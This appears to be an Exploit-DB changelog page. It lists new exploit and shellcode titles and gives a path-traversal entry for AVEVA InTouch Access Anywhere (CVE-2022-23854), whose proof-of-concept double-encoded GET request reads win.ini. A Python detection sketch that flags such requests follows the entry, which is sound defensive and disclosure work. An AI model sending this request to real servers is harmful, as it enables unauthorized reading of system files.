
7 changes to exploits/shellcodes/ghdb

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
MSNSwitch Firmware MNT.2408 - Remote Code Execution (RCE)
SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
CVAT 2.0 - SSRF (Server Side Request Forgery)
IOTransfer V4 - Unquoted Service Path
NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)
Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)
Linux/MIPS - reboot() Shellcode (32 bytes)
Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
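
The request above hides `..\` behind two layers of percent-encoding, so a filter that decodes only once never sees the traversal. The following detection sketch is an added example, not part of the original exploit entry or of the vendor's code: it decodes a logged request path until it stops changing, then checks whether the resolved path leaves the `/AccessAnywhere/` prefix. The function names, the decode limit and every sample line except the first are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

ROOT = "/AccessAnywhere/"   # URL prefix taken from the request on this page
MAX_ROUNDS = 5              # assumed upper bound on nested percent-encoding
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # ".." as a whole path segment

def decode_fully(path, max_rounds=MAX_ROUNDS):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(request_line):
    """Return a finding for one 'METHOD path HTTP/x' line, or None if it is clean."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return None
    decoded, rounds = decode_fully(parts[1].split("?", 1)[0])
    if not TRAVERSAL.search(decoded):
        return None
    # Treat '\' like '/' (Windows target), then collapse the '..' segments.
    resolved = posixpath.normpath(decoded.replace("\\", "/"))
    return {
        "encoding_layers": rounds,
        "resolved": resolved,
        "escapes_root": not (resolved + "/").startswith(ROOT),
    }

# Constructed sample log lines; the first one is the request shown on this page.
SAMPLE = [
    "GET /AccessAnywhere/" + "%252e%252e%255c" * 10 + "windows%255cwin.ini HTTP/1.1",
    "GET /AccessAnywhere/login.html HTTP/1.1",
    "GET /AccessAnywhere/docs/release%20notes..v2.pdf HTTP/1.1",  # dots inside a name
    "GET /AccessAnywhere/..%5cconfig HTTP/1.1",                   # single-encoded
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "<-", line[:60])
```

A finding with `encoding_layers` of 2 or more is worth alerting on by itself, since legitimate clients rarely double-encode path separators.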